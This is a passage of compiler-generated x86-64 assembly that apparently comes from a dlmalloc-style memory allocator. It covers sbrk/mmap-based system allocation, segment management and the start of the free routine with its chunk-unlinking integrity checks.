movq -16(%rbp), %rax
orl (%rax), %ecx
movl %ecx, (%rax)
jmp LBB2_96
LBB2_92:
movq -208(%rbp), %rax
movq 16(%rax), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_94
## %bb.93:
movq -208(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -216(%rbp)
jmp LBB2_95
LBB2_94:
callq _abort
LBB2_95:
jmp LBB2_96
LBB2_96:
movq -128(%rbp), %rcx
movq -208(%rbp), %rax
movq %rcx, 16(%rax)
movq -128(%rbp), %rcx
movq -216(%rbp), %rax
movq %rcx, 24(%rax)
movq -216(%rbp), %rcx
movq -128(%rbp), %rax
movq %rcx, 16(%rax)
movq -208(%rbp), %rcx
movq -128(%rbp), %rax
movq %rcx, 24(%rax)
jmp LBB2_124
LBB2_97:
movq -128(%rbp), %rax
movq %rax, -224(%rbp)
movq -40(%rbp), %rax
shrq $8, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -240(%rbp)
cmpl $0, -240(%rbp)
jne LBB2_99
## %bb.98:
movl $0, -236(%rbp)
jmp LBB2_103
LBB2_99:
cmpl $65535, -240(%rbp) ## imm = 0xFFFF
jbe LBB2_101
## %bb.100:
movl $31, -236(%rbp)
jmp LBB2_102
LBB2_101:
movl -240(%rbp), %eax
bsrl %eax, %ecx
xorl $31, %ecx
movl $31, %eax
subl %ecx, %eax
movl %eax, -244(%rbp)
movl -244(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
movq -40(%rbp), %rdx
movl -244(%rbp), %ecx
addl $7, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rdx
movq %rdx, %rcx
andq $1, %rcx
addq %rcx, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -236(%rbp)
LBB2_102:
jmp LBB2_103
LBB2_103:
movq -16(%rbp), %rax
addq $600, %rax ## imm = 0x258
movl -236(%rbp), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -232(%rbp)
movl -236(%rbp), %ecx
movq -224(%rbp), %rax
movl %ecx, 56(%rax)
movq -224(%rbp), %rax
movq $0, 40(%rax)
movq -224(%rbp), %rax
movq $0, 32(%rax)
movq -16(%rbp), %rax
movl 4(%rax), %eax
movl -236(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB2_105
## %bb.104:
movl -236(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
movq -16(%rbp), %rax
orl 4(%rax), %ecx
movl %ecx, 4(%rax)
movq -224(%rbp), %rcx
movq -232(%rbp), %rax
movq %rcx, (%rax)
movq -232(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 48(%rax)
movq -224(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 24(%rax)
movq -224(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB2_123
LBB2_105:
movq -232(%rbp), %rax
movq (%rax), %rax
movq %rax, -256(%rbp)
movq -40(%rbp), %rax
movq %rax, -320(%rbp) ## 8-byte Spill
cmpl $31, -236(%rbp)
jne LBB2_107
## %bb.106:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -328(%rbp) ## 8-byte Spill
jmp LBB2_108
LBB2_107:
movl -236(%rbp), %eax
shrl $1, %eax
addl $8, %eax
subl $2, %eax
movl %eax, %eax
movl %eax, %ecx
movl $63, %eax
subq %rcx, %rax
movq %rax, -328(%rbp) ## 8-byte Spill
LBB2_108:
movq -320(%rbp), %rax ## 8-byte Reload
movq -328(%rbp), %rcx ## 8-byte Reload
## kill: def $cl killed $rcx
shlq %cl, %rax
movq %rax, -264(%rbp)
LBB2_109: ## =>This Inner Loop Header: Depth=1
movq -256(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
cmpq -40(%rbp), %rax
je LBB2_116
## %bb.110: ## in Loop: Header=BB2_109 Depth=1
movq -256(%rbp), %rax
addq $32, %rax
movq -264(%rbp), %rcx
shrq $63, %rcx
andq $1, %rcx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -272(%rbp)
movq -264(%rbp), %rax
shlq $1, %rax
movq %rax, -264(%rbp)
movq -272(%rbp), %rax
cmpq $0, (%rax)
je LBB2_112
## %bb.111: ## in Loop: Header=BB2_109 Depth=1
movq -272(%rbp), %rax
movq (%rax), %rax
movq %rax, -256(%rbp)
jmp LBB2_115
LBB2_112:
movq -272(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_114
## %bb.113:
movq -224(%rbp), %rcx
movq -272(%rbp), %rax
movq %rcx, (%rax)
movq -256(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 48(%rax)
movq -224(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 24(%rax)
movq -224(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB2_122
LBB2_114:
callq _abort
LBB2_115: ## in Loop: Header=BB2_109 Depth=1
jmp LBB2_121
LBB2_116:
movq -256(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -280(%rbp)
movq -256(%rbp), %rcx
movq -16(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -329(%rbp) ## 1-byte Spill
jb LBB2_118
## %bb.117:
movq -280(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
movb %al, -329(%rbp) ## 1-byte Spill
LBB2_118:
movb -329(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB2_120
## %bb.119:
movq -224(%rbp), %rcx
movq -280(%rbp), %rax
movq %rcx, 24(%rax)
movq -256(%rbp), %rax
movq %rcx, 16(%rax)
movq -280(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 16(%rax)
movq -256(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 24(%rax)
movq -224(%rbp), %rax
movq $0, 48(%rax)
jmp LBB2_122
LBB2_120:
callq _abort
LBB2_121: ## in Loop: Header=BB2_109 Depth=1
jmp LBB2_109
LBB2_122:
jmp LBB2_123
LBB2_123:
jmp LBB2_124
LBB2_124:
jmp LBB2_125
LBB2_125:
movq -32(%rbp), %rax
addq $16, %rax
movq %rax, -8(%rbp)
jmp LBB2_129
LBB2_126:
jmp LBB2_127
LBB2_127:
callq _abort
LBB2_128:
movq $0, -8(%rbp)
LBB2_129:
movq -8(%rbp), %rax
addq $336, %rsp ## imm = 0x150
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function sys_alloc
_sys_alloc: ## @sys_alloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $240, %rsp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq $-1, %rax
movq %rax, -32(%rbp)
movq $0, -40(%rbp)
movl $0, -44(%rbp)
movb $1, %al
cmpq $0, _mparams(%rip)
movb %al, -209(%rbp) ## 1-byte Spill
jne LBB3_2
## %bb.1:
callq _init_mparams
cmpl $0, %eax
setne %al
movb %al, -209(%rbp) ## 1-byte Spill
LBB3_2:
movb -209(%rbp), %al ## 1-byte Reload
movq -16(%rbp), %rax
movl 880(%rax), %eax
## kill: def $rax killed $eax
andq $1, %rax
cmpq $0, %rax
je LBB3_8
## %bb.3:
movq -24(%rbp), %rax
cmpq _mparams+24(%rip), %rax
jb LBB3_8
## %bb.4:
movq -16(%rbp), %rax
cmpq $0, 16(%rax)
je LBB3_8
## %bb.5:
movq -16(%rbp), %rdi
movq -24(%rbp), %rsi
callq _mmap_alloc
movq %rax, -64(%rbp)
cmpq $0, -64(%rbp)
je LBB3_7
## %bb.6:
movq -64(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB3_106
LBB3_7:
jmp LBB3_8
LBB3_8:
movq -24(%rbp), %rax
addq $96, %rax
movq _mparams+16(%rip), %rcx
subq $1, %rcx
addq %rcx, %rax
movq _mparams+16(%rip), %rcx
subq $1, %rcx
xorq $-1, %rcx
andq %rcx, %rax
movq %rax, -56(%rbp)
movq -56(%rbp), %rax
cmpq -24(%rbp), %rax
ja LBB3_10
## %bb.9:
movq $0, -8(%rbp)
jmp LBB3_106
LBB3_10:
movq -16(%rbp), %rax
cmpq $0, 872(%rax)
je LBB3_15
## %bb.11:
movq -16(%rbp), %rax
movq 856(%rax), %rax
addq -56(%rbp), %rax
movq %rax, -72(%rbp)
movq -72(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 856(%rcx), %rax
jbe LBB3_13
## %bb.12:
movq -72(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 872(%rcx), %rax
jbe LBB3_14
LBB3_13:
movq $0, -8(%rbp)
jmp LBB3_106
LBB3_14:
jmp LBB3_15
LBB3_15:
movq -16(%rbp), %rax
movl 880(%rax), %eax
andl $4, %eax
cmpl $0, %eax
jne LBB3_52
## %bb.16:
movq $-1, %rax
movq %rax, -80(%rbp)
movq -56(%rbp), %rax
movq %rax, -88(%rbp)
movq -16(%rbp), %rax
cmpq $0, 40(%rax)
jne LBB3_18
## %bb.17:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -224(%rbp) ## 8-byte Spill
jmp LBB3_19
LBB3_18:
movq -16(%rbp), %rdi
movq -16(%rbp), %rax
movq 40(%rax), %rsi
callq _segment_holding
movq %rax, -224(%rbp) ## 8-byte Spill
LBB3_19:
movq -224(%rbp), %rax ## 8-byte Reload
movq %rax, -96(%rbp)
cmpq $0, -96(%rbp)
jne LBB3_32
## %bb.20:
xorl %edi, %edi
callq _sbrk
movq %rax, -104(%rbp)
movq $-1, %rax
cmpq %rax, -104(%rbp)
je LBB3_31
## %bb.21:
movq -104(%rbp), %rax
movq _mparams+8(%rip), %rcx
subq $1, %rcx
andq %rcx, %rax
cmpq $0, %rax
je LBB3_23
## %bb.22:
movq -104(%rbp), %rax
movq _mparams+8(%rip), %rcx
subq $1, %rcx
addq %rcx, %rax
movq _mparams+8(%rip), %rcx
subq $1, %rcx
xorq $-1, %rcx
andq %rcx, %rax
movq -104(%rbp), %rcx
subq %rcx, %rax
addq -88(%rbp), %rax
movq %rax, -88(%rbp)
LBB3_23:
movq -16(%rbp), %rax
movq 856(%rax), %rax
addq -88(%rbp), %rax
movq %rax, -112(%rbp)
movq -88(%rbp), %rax
cmpq -24(%rbp), %rax
jbe LBB3_30
## %bb.24:
movabsq $9223372036854775807, %rax ## imm = 0x7FFFFFFFFFFFFFFF
cmpq %rax, -88(%rbp)
jae LBB3_30
## %bb.25:
movq -16(%rbp), %rax
cmpq $0, 872(%rax)
je LBB3_28
## %bb.26:
movq -112(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 856(%rcx), %rax
jbe LBB3_30
## %bb.27:
movq -112(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 872(%rcx), %rax
ja LBB3_30
LBB3_28:
movq -88(%rbp), %rax
movl %eax, %edi
callq _sbrk
movq %rax, -80(%rbp)
cmpq -104(%rbp), %rax
jne LBB3_30
## %bb.29:
movq -104(%rbp), %rax
movq %rax, -32(%rbp)
movq -88(%rbp), %rax
movq %rax, -40(%rbp)
LBB3_30:
jmp LBB3_31
LBB3_31:
jmp LBB3_36
LBB3_32:
movq -24(%rbp), %rax
movq -16(%rbp), %rcx
subq 16(%rcx), %rax
addq $96, %rax
movq _mparams+16(%rip), %rcx
subq $1, %rcx
addq %rcx, %rax
movq _mparams+16(%rip), %rcx
subq $1, %rcx
xorq $-1, %rcx
andq %rcx, %rax
movq %rax, -88(%rbp)
movabsq $9223372036854775807, %rax ## imm = 0x7FFFFFFFFFFFFFFF
cmpq %rax, -88(%rbp)
jae LBB3_35
## %bb.33:
movq -88(%rbp), %rax
movl %eax, %edi
callq _sbrk
movq %rax, -80(%rbp)
movq -96(%rbp), %rcx
movq (%rcx), %rcx
movq -96(%rbp), %rdx
addq 8(%rdx), %rcx
cmpq %rcx, %rax
jne LBB3_35
## %bb.34:
movq -80(%rbp), %rax
movq %rax, -32(%rbp)
movq -88(%rbp), %rax
movq %rax, -40(%rbp)
LBB3_35:
jmp LBB3_36
LBB3_36:
movq $-1, %rax
cmpq %rax, -32(%rbp)
jne LBB3_51
## %bb.37:
movq $-1, %rax
cmpq %rax, -80(%rbp)
je LBB3_47
## %bb.38:
movabsq $9223372036854775807, %rax ## imm = 0x7FFFFFFFFFFFFFFF
cmpq %rax, -88(%rbp)
jae LBB3_46
## %bb.39:
movq -88(%rbp), %rax
movq -24(%rbp), %rcx
addq $96, %rcx
cmpq %rcx, %rax
jae LBB3_46
## %bb.40:
movq -24(%rbp), %rax
addq $96, %rax
subq -88(%rbp), %rax
movq _mparams+16(%rip), %rcx
subq $1, %rcx
addq %rcx, %rax
movq _mparams+16(%rip), %rcx
subq $1, %rcx
xorq $-1, %rcx
andq %rcx, %rax
movq %rax, -120(%rbp)
movabsq $9223372036854775807, %rax ## imm = 0x7FFFFFFFFFFFFFFF
cmpq %rax, -120(%rbp)
jae LBB3_45
## %bb.41:
movq -120(%rbp), %rax
movl %eax, %edi
callq _sbrk
movq %rax, -128(%rbp)
movq $-1, %rax
cmpq %rax, -128(%rbp)
je LBB3_43
## %bb.42:
movq -120(%rbp), %rax
addq -88(%rbp), %rax
movq %rax, -88(%rbp)
jmp LBB3_44
LBB3_43:
xorl %eax, %eax
## kill: def $rax killed $eax
subq -88(%rbp), %rax
movl %eax, %edi
callq _sbrk
movq $-1, %rax
movq %rax, -80(%rbp)
LBB3_44:
jmp LBB3_45
LBB3_45:
jmp LBB3_46
LBB3_46:
jmp LBB3_47
LBB3_47:
movq $-1, %rax
cmpq %rax, -80(%rbp)
je LBB3_49
## %bb.48:
movq -80(%rbp), %rax
movq %rax, -32(%rbp)
movq -88(%rbp), %rax
movq %rax, -40(%rbp)
jmp LBB3_50
LBB3_49:
movq -16(%rbp), %rax
movl 880(%rax), %ecx
orl $4, %ecx
movl %ecx, 880(%rax)
LBB3_50:
jmp LBB3_51
LBB3_51:
jmp LBB3_52
LBB3_52:
movq $-1, %rax
cmpq %rax, -32(%rbp)
jne LBB3_56
## %bb.53:
movq -56(%rbp), %rsi
xorl %eax, %eax
movl %eax, %r9d
movl $3, %edx
movl $4098, %ecx ## imm = 0x1002
movl $4294967295, %r8d ## imm = 0xFFFFFFFF
movq %r9, %rdi
callq _mmap
movq %rax, -136(%rbp)
movq $-1, %rax
cmpq %rax, -136(%rbp)
je LBB3_55
## %bb.54:
movq -136(%rbp), %rax
movq %rax, -32(%rbp)
movq -56(%rbp), %rax
movq %rax, -40(%rbp)
movl $1, -44(%rbp)
LBB3_55:
jmp LBB3_56
LBB3_56:
movq $-1, %rax
cmpq %rax, -32(%rbp)
jne LBB3_66
## %bb.57:
movabsq $9223372036854775807, %rax ## imm = 0x7FFFFFFFFFFFFFFF
cmpq %rax, -56(%rbp)
jae LBB3_65
## %bb.58:
movq $-1, %rax
movq %rax, -144(%rbp)
movq $-1, %rax
movq %rax, -152(%rbp)
movq -56(%rbp), %rax
movl %eax, %edi
callq _sbrk
movq %rax, -144(%rbp)
xorl %edi, %edi
callq _sbrk
movq %rax, -152(%rbp)
movq $-1, %rax
cmpq %rax, -144(%rbp)
je LBB3_64
## %bb.59:
movq $-1, %rax
cmpq %rax, -152(%rbp)
je LBB3_64
## %bb.60:
movq -144(%rbp), %rax
cmpq -152(%rbp), %rax
jae LBB3_64
## %bb.61:
movq -152(%rbp), %rax
movq -144(%rbp), %rcx
subq %rcx, %rax
movq %rax, -160(%rbp)
movq -160(%rbp), %rax
movq -24(%rbp), %rcx
addq $80, %rcx
cmpq %rcx, %rax
jbe LBB3_63
## %bb.62:
movq -144(%rbp), %rax
movq %rax, -32(%rbp)
movq -160(%rbp), %rax
movq %rax, -40(%rbp)
LBB3_63:
jmp LBB3_64
LBB3_64:
jmp LBB3_65
LBB3_65:
jmp LBB3_66
LBB3_66:
movq $-1, %rax
cmpq %rax, -32(%rbp)
je LBB3_105
## %bb.67:
movq -40(%rbp), %rax
movq -16(%rbp), %rcx
addq 856(%rcx), %rax
movq %rax, 856(%rcx)
movq -16(%rbp), %rcx
cmpq 864(%rcx), %rax
jbe LBB3_69
## %bb.68:
movq -16(%rbp), %rax
movq 856(%rax), %rcx
movq -16(%rbp), %rax
movq %rcx, 864(%rax)
LBB3_69:
movq -16(%rbp), %rax
cmpq $0, 40(%rax)
jne LBB3_77
## %bb.70:
movq -16(%rbp), %rax
cmpq $0, 24(%rax)
je LBB3_72
## %bb.71:
movq -32(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
jae LBB3_73
LBB3_72:
movq -32(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 24(%rax)
LBB3_73:
movq -32(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 888(%rax)
movq -40(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 896(%rax)
movl -44(%rbp), %ecx
movq -16(%rbp), %rax
movl %ecx, 912(%rax)
movq _mparams(%rip), %rcx
movq -16(%rbp), %rax
movq %rcx, 64(%rax)
movq -16(%rbp), %rax
movq $4095, 56(%rax) ## imm = 0xFFF
movq -16(%rbp), %rdi
callq _init_bins
leaq __gm_(%rip), %rax
cmpq %rax, -16(%rbp)
jne LBB3_75
## %bb.74:
movq -16(%rbp), %rdi
movq -32(%rbp), %rsi
movq -40(%rbp), %rdx
subq $80, %rdx
callq _init_top
jmp LBB3_76
LBB3_75:
movq -16(%rbp), %rax
addq $-16, %rax
movq -16(%rbp), %rcx
movq -8(%rcx), %rcx
andq $-8, %rcx
addq %rcx, %rax
movq %rax, -168(%rbp)
movq -16(%rbp), %rdi
movq -168(%rbp), %rsi
movq -32(%rbp), %rdx
addq -40(%rbp), %rdx
movq -168(%rbp), %rax
subq %rax, %rdx
subq $80, %rdx
callq _init_top
LBB3_76:
jmp LBB3_102
LBB3_77:
movq -16(%rbp), %rax
addq $888, %rax ## imm = 0x378
movq %rax, -176(%rbp)
LBB3_78: ## =>This Inner Loop Header: Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq $0, -176(%rbp)
movb %al, -225(%rbp) ## 1-byte Spill
je LBB3_80
## %bb.79: ## in Loop: Header=BB3_78 Depth=1
movq -32(%rbp), %rax
movq -176(%rbp), %rcx
movq (%rcx), %rcx
movq -176(%rbp), %rdx
addq 8(%rdx), %rcx
cmpq %rcx, %rax
setne %al
movb %al, -225(%rbp) ## 1-byte Spill
LBB3_80: ## in Loop: Header=BB3_78 Depth=1
movb -225(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB3_81
jmp LBB3_82
LBB3_81: ## in Loop: Header=BB3_78 Depth=1
movq -176(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -176(%rbp)
jmp LBB3_78
LBB3_82:
cmpq $0, -176(%rbp)
je LBB3_88
## %bb.83:
movq -176(%rbp), %rax
movl 24(%rax), %eax
andl $8, %eax
cmpl $0, %eax
jne LBB3_88
## %bb.84:
movq -176(%rbp), %rax
movl 24(%rax), %eax
## kill: def $rax killed $eax
andq $1, %rax
movl -44(%rbp), %ecx
## kill: def $rcx killed $ecx
cmpq %rcx, %rax
jne LBB3_88
## %bb.85:
movq -16(%rbp), %rax
movq 40(%rax), %rax
movq -176(%rbp), %rcx
cmpq (%rcx), %rax
jb LBB3_88
## %bb.86:
movq -16(%rbp), %rax
movq 40(%rax), %rax
movq -176(%rbp), %rcx
movq (%rcx), %rcx
movq -176(%rbp), %rdx
addq 8(%rdx), %rcx
cmpq %rcx, %rax
jae LBB3_88
## %bb.87:
movq -40(%rbp), %rcx
movq -176(%rbp), %rax
addq 8(%rax), %rcx
movq %rcx, 8(%rax)
movq -16(%rbp), %rdi
movq -16(%rbp), %rax
movq 40(%rax), %rsi
movq -16(%rbp), %rax
movq 16(%rax), %rdx
addq -40(%rbp), %rdx
callq _init_top
jmp LBB3_101
LBB3_88:
movq -32(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
jae LBB3_90
## %bb.89:
movq -32(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 24(%rax)
LBB3_90:
movq -16(%rbp), %rax
addq $888, %rax ## imm = 0x378
movq %rax, -176(%rbp)
LBB3_91: ## =>This Inner Loop Header: Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq $0, -176(%rbp)
movb %al, -226(%rbp) ## 1-byte Spill
je LBB3_93
## %bb.92: ## in Loop: Header=BB3_91 Depth=1
movq -176(%rbp), %rax
movq (%rax), %rax
movq -32(%rbp), %rcx
addq -40(%rbp), %rcx
cmpq %rcx, %rax
setne %al
movb %al, -226(%rbp) ## 1-byte Spill
LBB3_93: ## in Loop: Header=BB3_91 Depth=1
movb -226(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB3_94
jmp LBB3_95
LBB3_94: ## in Loop: Header=BB3_91 Depth=1
movq -176(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -176(%rbp)
jmp LBB3_91
LBB3_95:
cmpq $0, -176(%rbp)
je LBB3_99
## %bb.96:
movq -176(%rbp), %rax
movl 24(%rax), %eax
andl $8, %eax
cmpl $0, %eax
jne LBB3_99
## %bb.97:
movq -176(%rbp), %rax
movl 24(%rax), %eax
## kill: def $rax killed $eax
andq $1, %rax
movl -44(%rbp), %ecx
## kill: def $rcx killed $ecx
cmpq %rcx, %rax
jne LBB3_99
## %bb.98:
movq -176(%rbp), %rax
movq (%rax), %rax
movq %rax, -184(%rbp)
movq -32(%rbp), %rcx
movq -176(%rbp), %rax
movq %rcx, (%rax)
movq -40(%rbp), %rcx
movq -176(%rbp), %rax
addq 8(%rax), %rcx
movq %rcx, 8(%rax)
movq -16(%rbp), %rdi
movq -32(%rbp), %rsi
movq -184(%rbp), %rdx
movq -24(%rbp), %rcx
callq _prepend_alloc
movq %rax, -8(%rbp)
jmp LBB3_106
LBB3_99:
movq -16(%rbp), %rdi
movq -32(%rbp), %rsi
movq -40(%rbp), %rdx
movl -44(%rbp), %ecx
callq _add_segment
## %bb.100:
jmp LBB3_101
LBB3_101:
jmp LBB3_102
LBB3_102:
movq -24(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 16(%rcx), %rax
jae LBB3_104
## %bb.103:
movq -24(%rbp), %rdx
movq -16(%rbp), %rcx
movq 16(%rcx), %rax
subq %rdx, %rax
movq %rax, 16(%rcx)
movq %rax, -192(%rbp)
movq -16(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -200(%rbp)
movq -200(%rbp), %rax
addq -24(%rbp), %rax
movq -16(%rbp), %rcx
movq %rax, 40(%rcx)
movq %rax, -208(%rbp)
movq -192(%rbp), %rcx
orq $1, %rcx
movq -208(%rbp), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -200(%rbp), %rax
movq %rcx, 8(%rax)
movq -200(%rbp), %rax
addq $16, %rax
movq %rax, -8(%rbp)
jmp LBB3_106
LBB3_104:
jmp LBB3_105
LBB3_105:
callq ___error
movl $12, (%rax)
movq $0, -8(%rbp)
LBB3_106:
movq -8(%rbp), %rax
addq $240, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _free ## -- Begin function free
.p2align 4, 0x90
_free: ## @free
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $400, %rsp ## imm = 0x190
movq %rdi, -8(%rbp)
cmpq $0, -8(%rbp)
je LBB4_215
## %bb.1:
movq -8(%rbp), %rax
addq $-16, %rax
movq %rax, -16(%rbp)
movq -16(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq __gm_+24(%rip), %rcx
movb %al, -353(%rbp) ## 1-byte Spill
jb LBB4_3
## %bb.2:
movq -16(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $1, %rax
setne %al
movb %al, -353(%rbp) ## 1-byte Spill
LBB4_3:
movb -353(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_212
## %bb.4:
movq -16(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -24(%rbp)
movq -16(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -32(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
andq $1, %rax
cmpq $0, %rax
jne LBB4_87
## %bb.5:
movq -16(%rbp), %rax
movq (%rax), %rax
movq %rax, -40(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $0, %rax
jne LBB4_9
## %bb.6:
movq -40(%rbp), %rax
addq $32, %rax
addq -24(%rbp), %rax
movq %rax, -24(%rbp)
movq -16(%rbp), %rdi
xorl %eax, %eax
## kill: def $rax killed $eax
subq -40(%rbp), %rax
addq %rax, %rdi
movq -24(%rbp), %rsi
callq _munmap
cmpl $0, %eax
jne LBB4_8
## %bb.7:
movq -24(%rbp), %rcx
movq __gm_+856(%rip), %rax
subq %rcx, %rax
movq %rax, __gm_+856(%rip)
LBB4_8:
jmp LBB4_214
LBB4_9:
movq -16(%rbp), %rax
xorl %ecx, %ecx
## kill: def $rcx killed $ecx
subq -40(%rbp), %rcx
addq %rcx, %rax
movq %rax, -48(%rbp)
movq -40(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -24(%rbp)
movq -48(%rbp), %rax
movq %rax, -16(%rbp)
movq -48(%rbp), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_84
## %bb.10:
movq -16(%rbp), %rax
cmpq __gm_+32(%rip), %rax
je LBB4_80
## %bb.11:
movq -40(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB4_30
## %bb.12:
movq -16(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -56(%rbp)
movq -16(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -64(%rbp)
movq -40(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -68(%rbp)
movq -56(%rbp), %rcx
movl -68(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
leaq __gm_(%rip), %rdx
addq $72, %rdx
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -354(%rbp) ## 1-byte Spill
je LBB4_16
## %bb.13:
movq -56(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq __gm_+24(%rip), %rcx
movb %al, -355(%rbp) ## 1-byte Spill
jb LBB4_15
## %bb.14:
movq -56(%rbp), %rax
movq 24(%rax), %rax
cmpq -16(%rbp), %rax
sete %al
movb %al, -355(%rbp) ## 1-byte Spill
LBB4_15:
movb -355(%rbp), %al ## 1-byte Reload
movb %al, -354(%rbp) ## 1-byte Spill
LBB4_16:
movb -354(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_28
## %bb.17:
movq -64(%rbp), %rax
cmpq -56(%rbp), %rax
jne LBB4_19
## %bb.18:
movl -68(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
xorl $-1, %eax
andl __gm_(%rip), %eax
movl %eax, __gm_(%rip)
jmp LBB4_27
LBB4_19:
movq -64(%rbp), %rcx
movl -68(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
leaq __gm_(%rip), %rdx
addq $72, %rdx
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -356(%rbp) ## 1-byte Spill
je LBB4_23
## %bb.20:
movq -64(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq __gm_+24(%rip), %rcx
movb %al, -357(%rbp) ## 1-byte Spill
jb LBB4_22
## %bb.21:
movq -64(%rbp), %rax
movq 16(%rax), %rax
cmpq -16(%rbp), %rax
sete %al
movb %al, -357(%rbp) ## 1-byte Spill
LBB4_22:
movb -357(%rbp), %al ## 1-byte Reload
movb %al, -356(%rbp) ## 1-byte Spill
LBB4_23:
movb -356(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB4_25
## %bb.24:
movq -64(%rbp), %rcx
movq -56(%rbp), %rax
movq %rcx, 24(%rax)
movq -56(%rbp), %rcx
movq -64(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB4_26
LBB4_25:
callq _abort
LBB4_26:
jmp LBB4_27
LBB4_27:
jmp LBB4_29
LBB4_28:
callq _abort
LBB4_29:
jmp LBB4_79
LBB4_30:
movq -16(%rbp), %rax
movq %rax, -80(%rbp)
movq -80(%rbp), %rax
movq 48(%rax), %rax
movq %rax, -88(%rbp)
movq -80(%rbp), %rax
movq 24(%rax), %rax
cmpq -80(%rbp), %rax
je LBB4_38
## %bb.31:
movq -80(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -104(%rbp)
movq -80(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -96(%rbp)
movq -104(%rbp), %rcx
xorl %eax, %eax
